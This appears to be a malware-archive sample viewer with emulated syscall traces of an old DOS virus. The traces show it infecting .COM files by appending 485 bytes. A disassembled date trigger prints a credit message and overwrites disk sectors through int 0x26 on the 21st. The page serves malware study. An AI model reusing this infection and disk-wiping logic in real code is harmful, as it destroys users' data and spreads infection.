Sample viewer

vx.netlux.org/Virus.DOS.Rape.485.b

GIF

Syscalls:

Time	Syscall Op	Syscall Name
2018-12-17T22:41:42.253202611Z	42	PC: 12a8b \| Get date 0x12a8b: cmp dl, 0x15 0x12a8e: jne 0x12ab3 0x12a90: xor ax, ax 0x12a92: int 0x10 0x12a94: mov ah, 9 0x12a96: mov dx, si 0x12a98: add dx, 0x19a 0x12a9c: int 0x21 0x12a9e: mov ax, 0x1a 0x12aa1: mov cx, 0xff 0x12aa4: xor dx, dx 0x12aa6: push ax 0x12aa7: int 0x26 0x12aa9: popf 0x12aaa: pop ax 0x12aab: dec ax 0x12aac: cmp ax, 2 0x12aaf: jg 0x12aa1 0x12ab1: jmp 0x12a9e 0x12ab3: mov bp, 0
2018-12-17T22:41:42.256700792Z	78	PC: 12ac2 \| Find first file
2018-12-17T22:41:42.262875038Z	67	PC: 12ad9 \| Get or set file attributes
2018-12-17T22:41:42.280575718Z	61	PC: 12adf \| Open file (Filename = 'SLEEP.COM')
2018-12-17T22:41:42.288656231Z	63	PC: 12af0 \| Read file or device (Read 3 bytes on handle 5)
2018-12-17T22:41:42.301509336Z	66	PC: 12b19 \| Move file pointer
2018-12-17T22:41:42.303652386Z	87	PC: 12b7a \| Get or set file date and time
2018-12-17T22:41:42.307412685Z	62	PC: 12b7e \| Close file
2018-12-17T22:41:42.317834382Z	67	PC: 12b8a \| Get or set file attributes
2018-12-17T22:41:42.327660059Z	79	PC: 12b93 \| Find next file
2018-12-17T22:41:42.330518219Z	67	PC: 12ad9 \| Get or set file attributes
2018-12-17T22:41:42.3410805Z	61	PC: 12adf \| Open file (Filename = 'PRINT.COM')
2018-12-17T22:41:42.352785781Z	63	PC: 12af0 \| Read file or device (Read 3 bytes on handle 5)
2018-12-17T22:41:42.359361745Z	66	PC: 12b19 \| Move file pointer
2018-12-17T22:41:42.361862516Z	87	PC: 12b7a \| Get or set file date and time
2018-12-17T22:41:42.363693207Z	62	PC: 12b7e \| Close file
2018-12-17T22:41:42.37097486Z	67	PC: 12b8a \| Get or set file attributes
2018-12-17T22:41:42.385396267Z	79	PC: 12b93 \| Find next file
2018-12-17T22:41:42.388656156Z	67	PC: 12ad9 \| Get or set file attributes
2018-12-17T22:41:42.398352664Z	61	PC: 12adf \| Open file (Filename = 'HELLO.COM')
2018-12-17T22:41:42.405827361Z	63	PC: 12af0 \| Read file or device (Read 3 bytes on handle 5)
2018-12-17T22:41:42.412430012Z	66	PC: 12b19 \| Move file pointer
2018-12-17T22:41:42.414035194Z	87	PC: 12b7a \| Get or set file date and time
2018-12-17T22:41:42.4159669Z	62	PC: 12b7e \| Close file
2018-12-17T22:41:42.429912519Z	67	PC: 12b8a \| Get or set file attributes
2018-12-17T22:41:42.440105011Z	79	PC: 12b93 \| Find next file
2018-12-17T22:41:42.442878699Z	67	PC: 12ad9 \| Get or set file attributes
2018-12-17T22:41:42.452851566Z	61	PC: 12adf \| Open file (Filename = 'PHANG.COM')
2018-12-17T22:41:42.459408839Z	63	PC: 12af0 \| Read file or device (Read 3 bytes on handle 5)
2018-12-17T22:41:42.465963083Z	66	PC: 12b19 \| Move file pointer
2018-12-17T22:41:42.468886937Z	87	PC: 12b7a \| Get or set file date and time
2018-12-17T22:41:42.470759241Z	62	PC: 12b7e \| Close file
2018-12-17T22:41:42.478012343Z	67	PC: 12b8a \| Get or set file attributes
2018-12-17T22:41:42.507148596Z	79	PC: 12b93 \| Find next file
2018-12-17T22:41:42.509812925Z	67	PC: 12ad9 \| Get or set file attributes
2018-12-17T22:41:42.531618531Z	61	PC: 12adf \| Open file (Filename = 'PRINTA~1.COM')
2018-12-17T22:41:42.539345139Z	63	PC: 12af0 \| Read file or device (Read 3 bytes on handle 5)
2018-12-17T22:41:42.557899419Z	66	PC: 12b19 \| Move file pointer
2018-12-17T22:41:42.560242163Z	87	PC: 12b7a \| Get or set file date and time
2018-12-17T22:41:42.562959958Z	62	PC: 12b7e \| Close file
2018-12-17T22:41:42.570717622Z	67	PC: 12b8a \| Get or set file attributes
2018-12-17T22:41:42.595562204Z	79	PC: 12b93 \| Find next file
2018-12-17T22:41:42.599017751Z	67	PC: 12ad9 \| Get or set file attributes
2018-12-17T22:41:42.934072179Z	61	PC: 12adf \| Open file (Filename = 'MANDEL.COM')
2018-12-17T22:41:42.941663112Z	63	PC: 12af0 \| Read file or device (Read 3 bytes on handle 5)
2018-12-17T22:41:42.949430408Z	66	PC: 12b19 \| Move file pointer
2018-12-17T22:41:42.951352499Z	64	PC: 12b3a \| Write file or device (Write 3 bytes on handle 5)
2018-12-17T22:41:42.954400567Z	66	PC: 12b44 \| Move file pointer
2018-12-17T22:41:42.957654417Z	64	PC: 12c52 \| Write file or device (Write 485 bytes on handle 5)
2018-12-17T22:41:42.966999121Z	87	PC: 12b7a \| Get or set file date and time
2018-12-17T22:41:42.968946988Z	62	PC: 12b7e \| Close file
2018-12-17T22:41:42.97715566Z	67	PC: 12b8a \| Get or set file attributes

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":7305,"SideJobID":0}

GIF

Syscalls:

Time	Syscall Op	Syscall Name
2018-12-25T12:01:19.990392254Z	42	PC: 12a8b \| Get date 0x12a8b: cmp dl, 0x15 0x12a8e: jne 0x12ab3 0x12a90: xor ax, ax 0x12a92: int 0x10 0x12a94: mov ah, 9 0x12a96: mov dx, si 0x12a98: add dx, 0x19a 0x12a9c: int 0x21 0x12a9e: mov ax, 0x1a 0x12aa1: mov cx, 0xff 0x12aa4: xor dx, dx 0x12aa6: push ax 0x12aa7: int 0x26 0x12aa9: popf 0x12aaa: pop ax 0x12aab: dec ax 0x12aac: cmp ax, 2 0x12aaf: jg 0x12aa1 0x12ab1: jmp 0x12a9e 0x12ab3: mov bp, 0
2018-12-25T12:01:19.994176222Z	78	PC: 12ac2 \| Find first file
2018-12-25T12:01:20.000579549Z	67	PC: 12ad9 \| Get or set file attributes
2018-12-25T12:01:20.016147319Z	61	PC: 12adf \| Open file (Filename = 'SLEEP.COM')
2018-12-25T12:01:20.033593069Z	63	PC: 12af0 \| Read file or device (Read 3 bytes on handle 5)
2018-12-25T12:01:20.041299472Z	66	PC: 12b19 \| Move file pointer
2018-12-25T12:01:20.043916814Z	87	PC: 12b7a \| Get or set file date and time
2018-12-25T12:01:20.046588562Z	62	PC: 12b7e \| Close file
2018-12-25T12:01:20.054020305Z	67	PC: 12b8a \| Get or set file attributes
2018-12-25T12:01:20.065137721Z	79	PC: 12b93 \| Find next file
2018-12-25T12:01:20.069238247Z	67	PC: 12ad9 \| Get or set file attributes (See above)
2018-12-25T12:01:20.079678807Z	61	PC: 12adf \| Open file (See above)
2018-12-25T12:01:20.086601668Z	63	PC: 12af0 \| Read file or device (See above)
2018-12-25T12:01:20.093430299Z	66	PC: 12b19 \| Move file pointer (See above)
2018-12-25T12:01:20.095733329Z	87	PC: 12b7a \| Get or set file date and time (See above)
2018-12-25T12:01:20.097469166Z	62	PC: 12b7e \| Close file (See above)
2018-12-25T12:01:20.104733094Z	67	PC: 12b8a \| Get or set file attributes (See above)
2018-12-25T12:01:20.117764507Z	79	PC: 12b93 \| Find next file (See above)
2018-12-25T12:01:20.120441113Z	67	PC: 12ad9 \| Get or set file attributes (See above)
2018-12-25T12:01:20.129962142Z	61	PC: 12adf \| Open file (See above)
2018-12-25T12:01:20.136646952Z	63	PC: 12af0 \| Read file or device (See above)
2018-12-25T12:01:20.142778168Z	66	PC: 12b19 \| Move file pointer (See above)
2018-12-25T12:01:20.144015942Z	87	PC: 12b7a \| Get or set file date and time (See above)
2018-12-25T12:01:20.146103583Z	62	PC: 12b7e \| Close file (See above)
2018-12-25T12:01:20.153226465Z	67	PC: 12b8a \| Get or set file attributes (See above)
2018-12-25T12:01:20.162948296Z	79	PC: 12b93 \| Find next file (See above)
2018-12-25T12:01:20.166748095Z	67	PC: 12ad9 \| Get or set file attributes (See above)
2018-12-25T12:01:20.179951594Z	61	PC: 12adf \| Open file (See above)
2018-12-25T12:01:20.186918315Z	63	PC: 12af0 \| Read file or device (See above)
2018-12-25T12:01:20.194498278Z	66	PC: 12b19 \| Move file pointer (See above)
2018-12-25T12:01:20.197095458Z	87	PC: 12b7a \| Get or set file date and time (See above)
2018-12-25T12:01:20.202800896Z	62	PC: 12b7e \| Close file (See above)
2018-12-25T12:01:20.212220115Z	67	PC: 12b8a \| Get or set file attributes (See above)
2018-12-25T12:01:20.222460171Z	79	PC: 12b93 \| Find next file (See above)
2018-12-25T12:01:20.225467305Z	67	PC: 12ad9 \| Get or set file attributes (See above)
2018-12-25T12:01:20.235571541Z	61	PC: 12adf \| Open file (See above)
2018-12-25T12:01:20.248113534Z	63	PC: 12af0 \| Read file or device (See above)
2018-12-25T12:01:20.254635462Z	66	PC: 12b19 \| Move file pointer (See above)
2018-12-25T12:01:20.259932187Z	87	PC: 12b7a \| Get or set file date and time (See above)
2018-12-25T12:01:20.262210136Z	62	PC: 12b7e \| Close file (See above)
2018-12-25T12:01:20.269346958Z	67	PC: 12b8a \| Get or set file attributes (See above)
2018-12-25T12:01:20.279318066Z	79	PC: 12b93 \| Find next file (See above)
2018-12-25T12:01:20.282400755Z	67	PC: 12ad9 \| Get or set file attributes (See above)
2018-12-25T12:01:20.291883043Z	61	PC: 12adf \| Open file (See above)
2018-12-25T12:01:20.29862534Z	63	PC: 12af0 \| Read file or device (See above)
2018-12-25T12:01:20.305545011Z	66	PC: 12b19 \| Move file pointer (See above)
2018-12-25T12:01:20.306813479Z	64	PC: 12b3a \| Write file or device (Write 3 bytes on handle 5)
2018-12-25T12:01:20.309239827Z	66	PC: 12b44 \| Move file pointer
2018-12-25T12:01:20.311321692Z	64	PC: 12c52 \| Write file or device (Write 485 bytes on handle 5)
2018-12-25T12:01:20.319346882Z	87	PC: 12b7a \| Get or set file date and time (See above)
2018-12-25T12:01:20.320741638Z	62	PC: 12b7e \| Close file (See above)
2018-12-25T12:01:20.328903229Z	67	PC: 12b8a \| Get or set file attributes (See above)

{"DateBased":true,"Day":21,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":7305,"SideJobID":0}

GIF

Syscalls:

Time	Syscall Op	Syscall Name
2018-12-25T12:01:20.107980263Z	42	PC: 12a8b \| Get date 0x12a8b: cmp dl, 0x15 0x12a8e: jne 0x12ab3 0x12a90: xor ax, ax 0x12a92: int 0x10 0x12a94: mov ah, 9 0x12a96: mov dx, si 0x12a98: add dx, 0x19a 0x12a9c: int 0x21 0x12a9e: mov ax, 0x1a 0x12aa1: mov cx, 0xff 0x12aa4: xor dx, dx 0x12aa6: push ax 0x12aa7: int 0x26 0x12aa9: popf 0x12aaa: pop ax 0x12aab: dec ax 0x12aac: cmp ax, 2 0x12aaf: jg 0x12aa1 0x12ab1: jmp 0x12a9e 0x12ab3: mov bp, 0
2018-12-25T12:01:20.118179745Z	9	PC: 12a9e \| Display string (String= '486 Virus - (C)1991 RABID, InternationalBy Zodiac - RABID Priest')